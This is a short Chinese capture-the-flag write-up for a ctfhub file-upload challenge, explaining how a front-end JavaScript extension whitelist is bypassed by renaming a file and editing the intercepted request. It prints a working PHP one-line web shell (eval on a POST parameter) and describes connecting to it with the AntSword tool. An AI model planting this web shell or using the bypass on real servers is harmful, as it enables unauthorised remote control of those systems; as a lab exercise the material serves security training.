文件上传2-前端绕过(ctfhub)
一.题目链接:
https://www.ctfhub.com/#/skilltree
二.基础知识
2.1 什么是前端绕过
- 1:攻击者通过篡改浏览器前端的校验逻辑,绕过文件限制,将恶意文件上传到服务器的安全漏洞
三.开始解题
1.按照原来的方法进行上传,发现被限制了,我们去查看源码怎么回事

只被准许上传这些文件,我们来分析一下这串代码的重要部分

else
{
//定义准许的扩展白名单
var whitelist=new Array(".jpg",".png",".gif");
var file_suffix=file.substring(file.lastIndexOf("."));
//检查后缀名是否在白名单中,如果返回-1(不存在),则弹出警告并阻止上传
if(whitelist.indexOf(file_suffix) == -1)
{
alert("该文件不允许上传");
return false;
}
}
2.将后缀名添加jpg.利用抓包,再将后缀名删除

木马植入成功,木马playload为:<?php @eval($_POST["pass"]);?>

3.上传成功后,我们通过upload/1.php访问木马,访问成功,然后就可以用蚁剑连接了

4.连接前先进行测试,然后再用木马里的pass当密码

四.和无验证的差别
这个比无验证多了一些验证恶意文件的过滤,但显然是不够,可以通过构造合法的后缀进行绕过

浙公网安备 33010602011771号